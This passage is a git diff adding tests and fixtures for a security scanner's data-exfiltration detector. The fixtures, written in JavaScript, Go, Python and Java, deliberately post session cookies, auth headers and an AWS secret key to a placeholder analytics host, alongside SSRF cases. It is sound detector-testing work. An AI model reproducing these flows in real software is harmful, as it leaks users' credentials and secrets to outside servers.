+++ b/tests/fetch_data_exfil_suppression_tests.rs @@ -0,0 +1,142 @@ +//! `Cap::DATA_EXFIL` suppression-layer integration tests. +//! +//! Three layers are exercised: +//! +//! 1. Sanitizer convention. `logEvent({user: req.cookies.session})` +//! routes a Sensitive cookie source through a named telemetry +//! boundary; the default sanitizer rule for `logEvent` clears the +//! cap. +//! 2. Per-project destination allowlist. With +//! `detectors.data_exfil.trusted_destinations = ["https://api.internal/"]` +//! installed via the runtime, a `fetch('https://api.internal/...', +//! {body: tainted})` call has the cap suppressed for that gate only; +//! a `fetch('https://untrusted.example.com/...', ...)` call on a +//! destination NOT in the allowlist still emits the finding. +//! 3. Detector-class enabled toggle. When +//! `detectors.data_exfil.enabled = false` is installed, no +//! `taint-data-exfiltration` finding is emitted regardless of which +//! gate would have fired. +//! +//! All sub-cases run inside a single `#[test]` so the global +//! `detector_options` runtime is mutated sequentially. Each sub-case +//! installs its own configuration via `reinstall` and resets to defaults +//! at the end so other test binaries are unaffected. + +mod common; + +use common::scan_fixture_dir; +use nyx_scanner::commands::scan::Diag; +use nyx_scanner::utils::config::AnalysisMode; +use nyx_scanner::utils::detector_options::{DataExfilDetectorOptions, DetectorOptions, reinstall}; +use std::path::PathBuf; + +fn js_fixture_dir() -> PathBuf { + PathBuf::from(env!("CARGO_MANIFEST_DIR")) + .join("tests") + .join("fixtures") + .join("js") +} + +fn diags_for(file: &str) -> Vec { + let dir = js_fixture_dir(); + let all = scan_fixture_dir(&dir, AnalysisMode::Full); + all.into_iter().filter(|d| d.path.ends_with(file)).collect() +} + +fn count_data_exfil(diags: &[Diag]) -> usize { + diags + .iter() + .filter(|d| d.id.starts_with("taint-data-exfiltration")) + .count() +} + +fn install_default_detectors() { + reinstall(DetectorOptions::default()); +} + +fn install_with_trusted(prefixes: &[&str]) { + reinstall(DetectorOptions { + data_exfil: DataExfilDetectorOptions { + enabled: true, + trusted_destinations: prefixes.iter().map(|s| (*s).to_string()).collect(), + }, + }); +} + +fn install_disabled() { + reinstall(DetectorOptions { + data_exfil: DataExfilDetectorOptions { + enabled: false, + trusted_destinations: Vec::new(), + }, + }); +} + +#[test] +fn data_exfil_suppression_suite() { + // ── 1. sanitizer-convention: `logEvent` clears the cap. + install_default_detectors(); + let diags = diags_for("fetch_data_exfil_sanitizer_wrap.js"); + assert_eq!( + count_data_exfil(&diags), + 0, + "logEvent default sanitizer must clear DATA_EXFIL.\n\ + Diags: {:#?}", + diags.iter().map(|d| &d.id).collect::>(), + ); + + // ── 2a. allowlist drops cap on trusted destination. + install_with_trusted(&["https://api.internal/"]); + let diags = diags_for("fetch_data_exfil_allowlist_suppressed.js"); + assert_eq!( + count_data_exfil(&diags), + 0, + "trusted destination prefix must drop DATA_EXFIL for that filter.\n\ + Diags: {:#?}", + diags.iter().map(|d| &d.id).collect::>(), + ); + + // ── 2b. negative: a destination NOT in the allowlist still fires. + install_with_trusted(&["https://api.internal/"]); + let diags = diags_for("fetch_data_exfil_external_destination.js"); + assert!( + count_data_exfil(&diags) >= 1, + "destination not in allowlist must still emit DATA_EXFIL.\n\ + Diags: {:#?}", + diags.iter().map(|d| &d.id).collect::>(), + ); + + // ── 3a. detector toggle off ⇒ no DATA_EXFIL anywhere. + install_disabled(); + let diags_internal = diags_for("fetch_data_exfil_allowlist_suppressed.js"); + let diags_external = diags_for("fetch_data_exfil_external_destination.js"); + let diags_classic = diags_for("fetch_body_data_exfil.js"); + assert_eq!( + count_data_exfil(&diags_internal), + 0, + "enabled=false must suppress DATA_EXFIL on the internal-destination fixture", + ); + assert_eq!( + count_data_exfil(&diags_external), + 0, + "enabled=false must suppress DATA_EXFIL on the external-destination fixture", + ); + assert_eq!( + count_data_exfil(&diags_classic), + 0, + "enabled=false must suppress DATA_EXFIL on the original cookie-leak fixture", + ); + + // ── 3b. re-enable ⇒ classic cookie-leak fixture fires again + // (regression guard for the toggle). + install_default_detectors(); + let diags_classic = diags_for("fetch_body_data_exfil.js"); + assert!( + count_data_exfil(&diags_classic) >= 1, + "after re-enabling, the classic cookie-leak fixture must emit DATA_EXFIL again", + ); + + // Reset to defaults so other test binaries running later in the same + // process pick up the documented baseline. + install_default_detectors(); +} diff --git a/tests/fixtures/cross_file_data_exfil_split/caller_body_tainted.js b/tests/fixtures/cross_file_data_exfil_split/caller_body_tainted.js new file mode 100644 index 00000000..8b6e9499 --- /dev/null +++ b/tests/fixtures/cross_file_data_exfil_split/caller_body_tainted.js @@ -0,0 +1,16 @@ +var express = require('express'); +var { forward } = require('./helper'); + +var app = express(); + +// Tainted body, fixed URL: DATA_EXFIL must fire on the body flow. The +// session cookie is a Sensitive-tier source, so taint carries the +// DATA_EXFIL bit through to the wrapper's body-gate. SSRF must NOT +// fire — the URL is a hardcoded literal and the cap-vs-position split +// keeps the body's taint from leaking onto the URL's gate. +app.get('/sync', function(req, res) { + var sid = req.cookies.session; + var payload = JSON.stringify({ session: sid }); + forward('https://analytics.internal/track', payload); + res.status(204).end(); +}); diff --git a/tests/fixtures/cross_file_data_exfil_split/caller_url_tainted.js b/tests/fixtures/cross_file_data_exfil_split/caller_url_tainted.js new file mode 100644 index 00000000..2aebcbe4 --- /dev/null +++ b/tests/fixtures/cross_file_data_exfil_split/caller_url_tainted.js @@ -0,0 +1,14 @@ +var express = require('express'); +var { forward } = require('./helper'); + +var app = express(); + +// Tainted URL, fixed body: SSRF must fire on the URL flow. DATA_EXFIL +// must NOT fire — the body is a literal string, not a sensitive source, +// and the cap-vs-position split through the wrapper's summary keeps the +// URL's taint from leaking onto the body's gate. +app.get('/proxy', function(req, res) { + var taintedUrl = req.query.url; + forward(taintedUrl, '{"ok":true}'); + res.status(204).end(); +}); diff --git a/tests/fixtures/cross_file_data_exfil_split/expectations.json b/tests/fixtures/cross_file_data_exfil_split/expectations.json new file mode 100644 index 00000000..a3c3641a --- /dev/null +++ b/tests/fixtures/cross_file_data_exfil_split/expectations.json @@ -0,0 +1,22 @@ +{ + "required_findings": [ + { "id_prefix": "taint-unsanitised-flow", "min_count": 1 }, + { "id_prefix": "taint-data-exfiltration", "min_count": 1 } + ], + "forbidden_findings": [ + { + "id_prefix": "taint-data-exfiltration", + "file_glob": "**/caller_url_tainted.js" + }, + { + "id_prefix": "taint-unsanitised-flow", + "file_glob": "**/caller_body_tainted.js" + } + ], + "performance_expectations": { + "max_ms_no_index": 1500, + "max_ms_index_cold": 2000, + "max_ms_index_warm": 800, + "ci_mode": "lenient" + } +} diff --git a/tests/fixtures/cross_file_data_exfil_split/helper.js b/tests/fixtures/cross_file_data_exfil_split/helper.js new file mode 100644 index 00000000..568aa557 --- /dev/null +++ b/tests/fixtures/cross_file_data_exfil_split/helper.js @@ -0,0 +1,10 @@ +// Wrapper around `fetch` whose two parameters target distinct gated-sink +// classes on the inner call: `url` is the SSRF gate's destination; `body` +// is the DATA_EXFIL gate's payload. Pass-1 SSA summary extraction lifts +// the per-position cap split into `param_to_gate_filters` so cross-file +// callers can attribute SSRF vs DATA_EXFIL per argument. +function forward(url, body) { + fetch(url, { method: 'POST', body: body }); +} + +module.exports = { forward }; diff --git a/tests/fixtures/cross_file_go_data_exfil/caller_body_tainted.go b/tests/fixtures/cross_file_go_data_exfil/caller_body_tainted.go new file mode 100644 index 00000000..ca9e0bb3 --- /dev/null +++ b/tests/fixtures/cross_file_go_data_exfil/caller_body_tainted.go @@ -0,0 +1,17 @@ +// Tainted body, fixed URL: DATA_EXFIL must fire on the body flow. The +// session cookie is a Sensitive-tier source, so taint carries the +// DATA_EXFIL bit through to the wrapper's Do gate. SSRF must NOT fire — +// the URL is a hardcoded literal and per-position cap attribution keeps +// the body's taint from leaking onto the URL's gate. +package fixture + +import ( + "net/http" + "strings" +) + +func SyncCookie(r *http.Request) { + c, _ := r.Cookie("session") + body := strings.NewReader(c.Value) + Forward("https://analytics.internal/track", body) +} diff --git a/tests/fixtures/cross_file_go_data_exfil/caller_url_tainted.go b/tests/fixtures/cross_file_go_data_exfil/caller_url_tainted.go new file mode 100644 index 00000000..44dbbdf1 --- /dev/null +++ b/tests/fixtures/cross_file_go_data_exfil/caller_url_tainted.go @@ -0,0 +1,16 @@ +// Tainted URL, hardcoded body: SSRF must fire on the URL flow. The +// query param is a `Plain` user-input source, so even though it carries +// `Cap::all()` upstream the source-sensitivity gate strips DATA_EXFIL +// for plain inputs. Only SSRF survives. +package fixture + +import ( + "net/http" + "strings" +) + +func ProxyTarget(r *http.Request) { + target := r.URL.Query().Get("target") + body := strings.NewReader("hardcoded") + Forward(target, body) +} diff --git a/tests/fixtures/cross_file_go_data_exfil/expectations.json b/tests/fixtures/cross_file_go_data_exfil/expectations.json new file mode 100644 index 00000000..56235c2a --- /dev/null +++ b/tests/fixtures/cross_file_go_data_exfil/expectations.json @@ -0,0 +1,22 @@ +{ + "required_findings": [ + { "id_prefix": "taint-unsanitised-flow", "min_count": 1 }, + { "id_prefix": "taint-data-exfiltration", "min_count": 1 } + ], + "forbidden_findings": [ + { + "id_prefix": "taint-data-exfiltration", + "file_glob": "**/caller_url_tainted.go" + }, + { + "id_prefix": "taint-unsanitised-flow", + "file_glob": "**/caller_body_tainted.go" + } + ], + "performance_expectations": { + "max_ms_no_index": 1500, + "max_ms_index_cold": 2000, + "max_ms_index_warm": 800, + "ci_mode": "lenient" + } +} diff --git a/tests/fixtures/cross_file_go_data_exfil/helper.go b/tests/fixtures/cross_file_go_data_exfil/helper.go new file mode 100644 index 00000000..20bdd4ad --- /dev/null +++ b/tests/fixtures/cross_file_go_data_exfil/helper.go @@ -0,0 +1,16 @@ +// Wrapper whose two parameters target distinct gated-sink classes on the +// inner call: `url` is the SSRF gate's destination at `http.Post`'s +// arg 0; `body` is the DATA_EXFIL gate's payload at arg 2. Pass-1 SSA +// summary extraction lifts the per-position cap split into +// `param_to_gate_filters` so cross-file callers attribute SSRF vs +// DATA_EXFIL per argument. +package fixture + +import ( + "io" + "net/http" +) + +func Forward(url string, body io.Reader) { + http.Post(url, "text/plain", body) +} diff --git a/tests/fixtures/cross_file_python_data_exfil/caller_body_tainted.py b/tests/fixtures/cross_file_python_data_exfil/caller_body_tainted.py new file mode 100644 index 00000000..ea98dfad --- /dev/null +++ b/tests/fixtures/cross_file_python_data_exfil/caller_body_tainted.py @@ -0,0 +1,18 @@ +"""Tainted body, fixed URL: DATA_EXFIL must fire on the body flow. The +session cookie is a Sensitive-tier source, so taint carries the +DATA_EXFIL bit through to the wrapper's body-gate. SSRF must NOT fire — +the URL is a hardcoded literal and the cap-vs-position split keeps the +body's taint from leaking onto the URL's gate. +""" +from flask import Flask, session + +from helper import forward + +app = Flask(__name__) + + +@app.route('/sync') +def sync(): + sid = session.get('user_token') + forward('https://analytics.internal/track', {'session': sid}) + return '', 204 diff --git a/tests/fixtures/cross_file_python_data_exfil/caller_url_tainted.py b/tests/fixtures/cross_file_python_data_exfil/caller_url_tainted.py new file mode 100644 index 00000000..87c852cd --- /dev/null +++ b/tests/fixtures/cross_file_python_data_exfil/caller_url_tainted.py @@ -0,0 +1,17 @@ +"""Tainted URL, fixed body: SSRF must fire on the URL flow. DATA_EXFIL +must NOT fire — the body is a literal dict, not a sensitive source, and +the cap-vs-position split through the wrapper's summary keeps the URL's +taint from leaking onto the body's gate. +""" +from flask import Flask, request + +from helper import forward + +app = Flask(__name__) + + +@app.route('/proxy', methods=['POST']) +def proxy(): + tainted_url = request.args.get('url') + forward(tainted_url, {'event': 'proxy_call'}) + return '', 204 diff --git a/tests/fixtures/cross_file_python_data_exfil/expectations.json b/tests/fixtures/cross_file_python_data_exfil/expectations.json new file mode 100644 index 00000000..1191deb3 --- /dev/null +++ b/tests/fixtures/cross_file_python_data_exfil/expectations.json @@ -0,0 +1,22 @@ +{ + "required_findings": [ + { "id_prefix": "taint-unsanitised-flow", "min_count": 1 }, + { "id_prefix": "taint-data-exfiltration", "min_count": 1 } + ], + "forbidden_findings": [ + { + "id_prefix": "taint-data-exfiltration", + "file_glob": "**/caller_url_tainted.py" + }, + { + "id_prefix": "taint-unsanitised-flow", + "file_glob": "**/caller_body_tainted.py" + } + ], + "performance_expectations": { + "max_ms_no_index": 1500, + "max_ms_index_cold": 2000, + "max_ms_index_warm": 800, + "ci_mode": "lenient" + } +} diff --git a/tests/fixtures/cross_file_python_data_exfil/helper.py b/tests/fixtures/cross_file_python_data_exfil/helper.py new file mode 100644 index 00000000..06ecba7b --- /dev/null +++ b/tests/fixtures/cross_file_python_data_exfil/helper.py @@ -0,0 +1,12 @@ +"""Wrapper around requests.post whose two parameters target distinct +gated-sink classes on the inner call: `url` is the SSRF gate's destination +(arg 0); `body` is the DATA_EXFIL gate's payload (json kwarg). Pass-1 SSA +summary extraction lifts the per-position cap split into +`param_to_gate_filters` so cross-file callers can attribute SSRF vs +DATA_EXFIL per argument. +""" +import requests + + +def forward(url, body): + requests.post(url, json=body) diff --git a/tests/fixtures/demand_driven_data_exfil/app.py b/tests/fixtures/demand_driven_data_exfil/app.py new file mode 100644 index 00000000..4553a164 --- /dev/null +++ b/tests/fixtures/demand_driven_data_exfil/app.py @@ -0,0 +1,20 @@ +"""demand_driven_data_exfil. + +`Cap::DATA_EXFIL` parity for the backwards-analysis pass. The forward +engine emits a `taint-data-exfiltration` finding for the cookie → +fetch-body flow (Sensitive source, fixed destination URL). With +`backwards_analysis = true`, the post-pass must walk backwards from the +DATA_EXFIL sink demand, reach the cookie source, and annotate the +finding with `backwards-confirmed`. Validates that the cap-routing +logic in `taint/backwards.rs::DemandState` round-trips bit 13 +(DATA_EXFIL) identically to the SQL/CMD/SSRF caps the rest of the +demand-driven suite covers. +""" + +import requests +from flask import request + + +def forward_session(): + sid = request.cookies.get("session") + requests.post("https://analytics.internal/track", json={"session": sid}) diff --git a/tests/fixtures/demand_driven_data_exfil/expectations.json b/tests/fixtures/demand_driven_data_exfil/expectations.json new file mode 100644 index 00000000..8e37c667 --- /dev/null +++ b/tests/fixtures/demand_driven_data_exfil/expectations.json @@ -0,0 +1,16 @@ +{ + "required_findings": [ + { "id_prefix": "taint-data-exfiltration", "min_count": 1 } + ], + "forbidden_findings": [], + "noise_budget": { + "max_total_findings": 4, + "max_high_findings": 2 + }, + "performance_expectations": { + "max_ms_no_index": 1500, + "max_ms_index_cold": 2000, + "max_ms_index_warm": 800, + "ci_mode": "lenient" + } +} diff --git a/tests/fixtures/go/data_exfil_http_post.go b/tests/fixtures/go/data_exfil_http_post.go new file mode 100644 index 00000000..6bf05eb9 --- /dev/null +++ b/tests/fixtures/go/data_exfil_http_post.go @@ -0,0 +1,19 @@ +// DATA_EXFIL fixture: a fixed destination URL and a Sensitive (cookie) +// source flowing into the outbound body of `http.Post`. SSRF must NOT +// fire (URL is hardcoded, position 0) but `Cap::DATA_EXFIL` must fire on +// the body (position 2) — the auth cookie is exactly the cross-boundary +// state DATA_EXFIL targets. +// +// Driven by `data_exfil_go_integration_tests.rs`. +package fixture + +import ( + "net/http" + "strings" +) + +func leakCookie(r *http.Request) { + c, _ := r.Cookie("session") + body := strings.NewReader(c.Value) + http.Post("https://analytics.internal/track", "text/plain", body) +} diff --git a/tests/fixtures/go/data_exfil_map_assign.go b/tests/fixtures/go/data_exfil_map_assign.go new file mode 100644 index 00000000..da22bb39 --- /dev/null +++ b/tests/fixtures/go/data_exfil_map_assign.go @@ -0,0 +1,27 @@ +// Container-taint DATA_EXFIL: a `map[string]string` is populated with +// Sensitive cookie values across two keys, then encoded as form data and +// shipped as the body of an outbound `http.PostForm`. The Go SSA heap +// model marks the map's `Elements` slot tainted on every `payload[k] = +// ...` write; the sink-side `collect_tainted_sink_values` heap-loads +// the same slot when checking the form-data argument, so DATA_EXFIL +// must fire on the body channel even though the local map name itself +// is not directly tainted by an Assign. Pairs with +// `data_exfil_post_form.go` (single-write `url.Values` literal — no +// container-mutation step). +// +// Driven by `data_exfil_go_integration_tests.rs::map_assign_data_exfil`. +package fixture + +import ( + "net/http" + "net/url" +) + +func leakSessionMap(r *http.Request) { + c, _ := r.Cookie("session") + a, _ := r.Cookie("auth") + form := url.Values{} + form["session"] = []string{c.Value} + form["auth"] = []string{a.Value} + http.PostForm("https://analytics.internal/track", form) +} diff --git a/tests/fixtures/go/data_exfil_new_request_do.go b/tests/fixtures/go/data_exfil_new_request_do.go new file mode 100644 index 00000000..c73d92b1 --- /dev/null +++ b/tests/fixtures/go/data_exfil_new_request_do.go @@ -0,0 +1,24 @@ +// DATA_EXFIL fixture for the two-step `http.NewRequest` → `client.Do` +// idiom. `http.NewRequest` is modeled as a body propagator (default +// arg → return propagation lifts body taint onto the returned +// `*http.Request`); the outbound network call happens at +// `http.DefaultClient.Do`, where the DATA_EXFIL gate fires on the +// request argument. +// +// SSRF must NOT fire (URL is hardcoded at NewRequest's URL position) and +// the cookie-derived body must surface DATA_EXFIL at the Do call. +// +// Driven by `data_exfil_go_integration_tests.rs`. +package fixture + +import ( + "net/http" + "strings" +) + +func leakViaNewRequest(r *http.Request) { + c, _ := r.Cookie("session") + body := strings.NewReader(c.Value) + req, _ := http.NewRequest("POST", "https://analytics.internal/track", body) + http.DefaultClient.Do(req) +} diff --git a/tests/fixtures/go/data_exfil_post_form.go b/tests/fixtures/go/data_exfil_post_form.go new file mode 100644 index 00000000..523eceaf --- /dev/null +++ b/tests/fixtures/go/data_exfil_post_form.go @@ -0,0 +1,18 @@ +// DATA_EXFIL fixture: a Sensitive (header) source flowing into the form +// payload of `http.PostForm` (arg 1, `url.Values`). The destination URL +// is hardcoded so SSRF does not fire; only the form-data path activates +// the body-position gate. +// +// Driven by `data_exfil_go_integration_tests.rs`. +package fixture + +import ( + "net/http" + "net/url" +) + +func leakAuthHeader(r *http.Request) { + auth := r.Header.Get("Authorization") + form := url.Values{"token": []string{auth}} + http.PostForm("https://analytics.internal/track", form) +} diff --git a/tests/fixtures/go/data_exfil_user_input_silenced.go b/tests/fixtures/go/data_exfil_user_input_silenced.go new file mode 100644 index 00000000..d0e56762 --- /dev/null +++ b/tests/fixtures/go/data_exfil_user_input_silenced.go @@ -0,0 +1,19 @@ +// DATA_EXFIL silenced regression fixture: plain user input echoed into +// the body of an outbound `http.Post` to a fixed URL must NOT fire +// `Cap::DATA_EXFIL`. The user already controls `r.FormValue("msg")`, so +// surfacing it back into the request payload is not a cross-boundary +// disclosure. Source-sensitivity gating in `ast.rs` strips the cap. +// +// Driven by `data_exfil_go_integration_tests.rs`. +package fixture + +import ( + "net/http" + "strings" +) + +func forwardUserInput(r *http.Request) { + msg := r.FormValue("msg") + body := strings.NewReader(msg) + http.Post("https://analytics.internal/track", "text/plain", body) +} diff --git a/tests/fixtures/go/ssrf_url_tainted.go b/tests/fixtures/go/ssrf_url_tainted.go new file mode 100644 index 00000000..fbafdb06 --- /dev/null +++ b/tests/fixtures/go/ssrf_url_tainted.go @@ -0,0 +1,18 @@ +// SSRF regression fixture: attacker-controlled destination URL flows +// into `http.NewRequest`'s URL position (arg 1). SSRF must fire on the +// URL flow; DATA_EXFIL must NOT fire (the body is hardcoded `nil`). +// Cap attribution is per-position so a tainted URL never surfaces as +// data exfiltration. +// +// Driven by `data_exfil_go_integration_tests.rs`. +package fixture + +import ( + "net/http" +) + +func proxy(r *http.Request) { + target := r.URL.Query().Get("target") + req, _ := http.NewRequest("GET", target, nil) + http.DefaultClient.Do(req) +} diff --git a/tests/fixtures/java/data_exfil_apache_httpclient.java b/tests/fixtures/java/data_exfil_apache_httpclient.java new file mode 100644 index 00000000..ed3530db --- /dev/null +++ b/tests/fixtures/java/data_exfil_apache_httpclient.java @@ -0,0 +1,27 @@ +// DATA_EXFIL fixture: Apache HttpClient. A request cookie (Sensitive) +// is wrapped in a StringEntity (default smear) and attached to an +// HttpPost via setEntity (also default smear). The network call +// happens at `httpClient.execute(req)`, which type-qualified resolution +// rewrites to `HttpClient.execute` via JAVA_HIERARCHY +// (CloseableHttpClient subtypes HttpClient). SSRF must NOT fire (URL +// is a hardcoded constant on the HttpPost ctor). +// +// Driven by `data_exfil_java_integration_tests.rs`. +import javax.servlet.http.Cookie; +import javax.servlet.http.HttpServletRequest; +import org.apache.http.HttpResponse; +import org.apache.http.client.methods.HttpPost; +import org.apache.http.entity.StringEntity; +import org.apache.http.impl.client.CloseableHttpClient; +import org.apache.http.impl.client.HttpClients; + +public class DataExfilApacheHttpClient { + public void leak(HttpServletRequest request) throws Exception { + Cookie[] cookies = request.getCookies(); + String session = cookies[0].getValue(); + CloseableHttpClient httpClient = HttpClients.createDefault(); + HttpPost req = new HttpPost("https://analytics.internal/track"); + req.setEntity(new StringEntity(session)); + HttpResponse resp = httpClient.execute(req); + } +} diff --git a/tests/fixtures/java/data_exfil_jdk_httpclient.java b/tests/fixtures/java/data_exfil_jdk_httpclient.java new file mode 100644 index 00000000..d41bb809 --- /dev/null +++ b/tests/fixtures/java/data_exfil_jdk_httpclient.java @@ -0,0 +1,28 @@ +// DATA_EXFIL fixture: java.net.http chain. A Sensitive source (cookie) +// flows through `BodyPublishers.ofString(payload)` and the request +// builder chain into `client.send(req)` at a hardcoded URL. SSRF must +// NOT fire (URL is a fixed string) and `Cap::DATA_EXFIL` must fire +// because the cookie is exactly the cross-boundary state the cap +// targets. +// +// Driven by `data_exfil_java_integration_tests.rs`. +import java.net.URI; +import java.net.http.HttpClient; +import java.net.http.HttpRequest; +import java.net.http.HttpRequest.BodyPublishers; +import java.net.http.HttpResponse.BodyHandlers; +import javax.servlet.http.Cookie; +import javax.servlet.http.HttpServletRequest; + +public class DataExfilJdkHttpClient { + public void leak(HttpServletRequest request) throws Exception { + Cookie[] cookies = request.getCookies(); + String session = cookies[0].getValue(); + HttpClient client = HttpClient.newHttpClient(); + HttpRequest req = HttpRequest.newBuilder() + .uri(URI.create("https://analytics.internal/track")) + .POST(BodyPublishers.ofString(session)) + .build(); + client.send(req, BodyHandlers.ofString()); + } +} diff --git a/tests/fixtures/java/data_exfil_okhttp.java b/tests/fixtures/java/data_exfil_okhttp.java new file mode 100644 index 00000000..680bc37a --- /dev/null +++ b/tests/fixtures/java/data_exfil_okhttp.java @@ -0,0 +1,28 @@ +// DATA_EXFIL fixture: OkHttp two-step. A session attribute (Sensitive) +// is wrapped via `RequestBody.create` (default arg → return smear) +// and bound to the request via the builder chain. The network call +// happens at `client.newCall(req).execute()` which hits the +// chain-normalized `newCall.execute` matcher. SSRF must NOT fire on +// the hardcoded URL. +// +// Driven by `data_exfil_java_integration_tests.rs`. +import javax.servlet.http.HttpSession; +import okhttp3.MediaType; +import okhttp3.OkHttpClient; +import okhttp3.Request; +import okhttp3.RequestBody; +import okhttp3.Response; + +public class DataExfilOkHttp { + public void leak(HttpSession session) throws Exception { + String token = (String) session.getAttribute("csrfToken"); + OkHttpClient client = new OkHttpClient(); + RequestBody body = RequestBody.create( + token, MediaType.parse("text/plain")); + Request req = new Request.Builder() + .url("https://analytics.internal/track") + .post(body) + .build(); + Response resp = client.newCall(req).execute(); + } +} diff --git a/tests/fixtures/java/data_exfil_resttemplate.java b/tests/fixtures/java/data_exfil_resttemplate.java new file mode 100644 index 00000000..4fd381e5 --- /dev/null +++ b/tests/fixtures/java/data_exfil_resttemplate.java @@ -0,0 +1,23 @@ +// DATA_EXFIL fixture: Spring RestTemplate. An HTTP header value (a +// Sensitive source) flows directly into the request body of +// `restTemplate.postForObject(url, body, type)`. The destination URL +// is hardcoded so SSRF must NOT fire. `Cap::DATA_EXFIL` must fire on +// the body position. Type-qualified resolution rewrites +// `restTemplate.postForObject` → `HttpClient.postForObject` via the +// JAVA_HIERARCHY (RestTemplate subtypes HttpClient), reusing the same +// flat sink rule the JDK client uses. +// +// Driven by `data_exfil_java_integration_tests.rs`. +import javax.servlet.http.HttpServletRequest; +import org.springframework.web.client.RestTemplate; + +public class DataExfilRestTemplate { + public void leak(HttpServletRequest request) { + String authHeader = request.getHeader("Authorization"); + RestTemplate restTemplate = new RestTemplate(); + restTemplate.postForObject( + "https://analytics.internal/track", + authHeader, + String.class); + } +} diff --git a/tests/fixtures/java/data_exfil_webclient.java b/tests/fixtures/java/data_exfil_webclient.java new file mode 100644 index 00000000..f9e61864 --- /dev/null +++ b/tests/fixtures/java/data_exfil_webclient.java @@ -0,0 +1,20 @@ +// DATA_EXFIL fixture: Spring WebClient. A Sensitive source (env var) +// flows through `.bodyValue(payload)` on a fixed-URL chain. SSRF must +// NOT fire (URL is hardcoded) and `Cap::DATA_EXFIL` must fire at the +// body-binding step, since the bare-name `bodyValue` matcher hits +// independent of receiver type. +// +// Driven by `data_exfil_java_integration_tests.rs`. +import org.springframework.web.reactive.function.client.WebClient; + +public class DataExfilWebClient { + public void leak() { + String secret = System.getenv("AWS_SECRET_ACCESS_KEY"); + WebClient webClient = WebClient.create(); + webClient.post() + .uri("https://analytics.internal/track") + .bodyValue(secret) + .retrieve() + .bodyToMono(String.class); + } +} diff --git a/tests/fixtures/java/ssrf_url_only_no_data_exfil.java b/tests/fixtures/java/ssrf_url_only_no_data_exfil.java new file mode 100644 index 00000000..71a14712 --- /dev/null +++ b/tests/fixtures/java/ssrf_url_only_no_data_exfil.java @@ -0,0 +1,25 @@ +// Regression fixture: a tainted URL flowing into HttpClient.send must +// fire SSRF (taint-unsanitised-flow) but must NOT fire DATA_EXFIL. +// The body is a hardcoded literal so no Sensitive payload reaches the +// outbound request. This guards against over-firing DATA_EXFIL on +// flows where only the URL position is attacker-controlled. +// +// Driven by `data_exfil_java_integration_tests.rs`. +import java.net.URI; +import java.net.http.HttpClient; +import java.net.http.HttpRequest; +import java.net.http.HttpRequest.BodyPublishers; +import java.net.http.HttpResponse.BodyHandlers; +import javax.servlet.http.HttpServletRequest; + +public class SsrfUrlOnlyNoDataExfil { + public void doGet(HttpServletRequest request) throws Exception { + String target = request.getParameter("url"); + HttpClient client = HttpClient.newHttpClient(); + HttpRequest req = HttpRequest.newBuilder() + .uri(URI.create(target)) + .POST(BodyPublishers.ofString("ping")) + .build(); + client.send(req, BodyHandlers.ofString()); + } +} diff --git a/tests/fixtures/js/fetch_body_data_exfil.js b/tests/fixtures/js/fetch_body_data_exfil.js index 8d2792b6..8d7447be 100644 --- a/tests/fixtures/js/fetch_body_data_exfil.js +++ b/tests/fixtures/js/fetch_body_data_exfil.js @@ -1,11 +1,15 @@ -// DATA_EXFIL fixture: a fixed destination URL and an attacker-influenced -// body. SSRF must NOT fire (destination is hardcoded) but `Cap::DATA_EXFIL` -// must fire on the body field — request-bound bytes are leaving the process -// via the outbound request payload. +// DATA_EXFIL fixture: a fixed destination URL and a sensitive (cookie / +// session) source flowing into the outbound body. SSRF must NOT fire +// (destination is hardcoded) but `Cap::DATA_EXFIL` must fire because the +// source is Sensitive (`req.cookies.session` carries auth material) — exactly +// the cross-boundary leak the cap targets. +// +// Plain user input echoed back into a body is intentionally not classified +// as data exfiltration, see `fetch_body_user_input_silenced.js`. // // Driven by `fetch_data_exfil_integration_tests.rs`. function leakBody(req) { - var payload = req.body.message; + var payload = req.cookies.session; fetch('/endpoint', { method: 'POST', body: payload, diff --git a/tests/fixtures/js/fetch_body_int_suppressed.js b/tests/fixtures/js/fetch_body_int_suppressed.js new file mode 100644 index 00000000..8119d1ba --- /dev/null +++ b/tests/fixtures/js/fetch_body_int_suppressed.js @@ -0,0 +1,19 @@ +// DATA_EXFIL type-suppression fixture: a Sensitive cookie source coerced +// to an integer via `parseInt(...)` is NOT a credential payload; the +// resulting numeric body cannot encode a session token, header secret, or +// other exfiltratable material. The type-aware sink suppression in +// `is_type_safe_for_sink` (see `src/ssa/type_facts.rs`) recognises the +// proven-`Int` SSA value at the gate and silences the cap. +// +// Negative regression: without DATA_EXFIL in the type-suppressible mask +// this would over-fire on every `fetch({ body: parseInt(req.cookies.x) })` +// pattern (e.g. analytics ingestion of session counters). +// +// Driven by `fetch_data_exfil_integration_tests.rs`. +function reportSessionCount(req) { + var count = parseInt(req.cookies.session_count, 10); + fetch('/metrics', { + method: 'POST', + body: count, + }); +} diff --git a/tests/fixtures/js/fetch_body_user_input_silenced.js b/tests/fixtures/js/fetch_body_user_input_silenced.js new file mode 100644 index 00000000..84ca93f8 --- /dev/null +++ b/tests/fixtures/js/fetch_body_user_input_silenced.js @@ -0,0 +1,15 @@ +// DATA_EXFIL silenced regression fixture: plain user input echoed into the +// body of an outbound `fetch` to a fixed URL must NOT fire `Cap::DATA_EXFIL`. +// The user already controls `req.body.message` — surfacing it back into the +// request payload is not a cross-boundary disclosure. This is the canonical +// false-positive class for API gateways and telemetry forwarders that proxy +// `req.body`, killed by the source-sensitivity gate in `ast.rs`. +// +// Driven by `fetch_data_exfil_integration_tests.rs`. +function forward(req) { + var payload = req.body.message; + fetch('/endpoint', { + method: 'POST', + body: payload, + }); +} diff --git a/tests/fixtures/js/fetch_data_exfil_allowlist_suppressed.js b/tests/fixtures/js/fetch_data_exfil_allowlist_suppressed.js new file mode 100644 index 00000000..bed375ca --- /dev/null +++ b/tests/fixtures/js/fetch_data_exfil_allowlist_suppressed.js @@ -0,0 +1,17 @@ +// DATA_EXFIL allowlist-suppression fixture. +// +// The destination URL has a static prefix (`https://api.internal/...`) that +// the test harness installs as a trusted destination via +// [detectors.data_exfil.trusted_destinations]. The body still carries a +// Sensitive source (`req.cookies.session`), but routing it through a known- +// trusted upstream is a *legitimate* forwarding pipeline: the cap is +// suppressed for this filter only. +// +// Driven by `fetch_data_exfil_suppression_tests.rs`. +function leakBody(req) { + var payload = req.cookies.session; + fetch('https://api.internal/forward', { + method: 'POST', + body: payload, + }); +} diff --git a/tests/fixtures/js/fetch_data_exfil_external_destination.js b/tests/fixtures/js/fetch_data_exfil_external_destination.js new file mode 100644 index 00000000..396b4f12 --- /dev/null +++ 